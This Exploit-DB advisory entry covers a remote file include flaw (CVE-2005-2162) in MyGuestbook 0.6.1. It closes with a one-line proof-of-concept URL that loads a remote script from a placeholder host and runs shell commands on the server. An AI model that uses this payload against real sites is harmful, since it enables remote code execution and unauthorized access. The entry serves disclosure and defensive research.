MyGuestbook 0.6.1 Form.Inc.PHP3 - Remote File Include Vulnerability

2005-07-05T00:00:00
ID EDB-ID:25941
Type exploitdb
Reporter SoulBlack Group
Modified 2005-07-05T00:00:00

Description

MyGuestbook 0.6.1 Form.Inc.PHP3 Remote File Include Vulnerability. CVE-2005-2162 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/14155/info

MyGuestbook is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/gb/form.inc.php3?lang=http://www.example.com/cmd.gif?&cmd=id;uname%20-a;uptime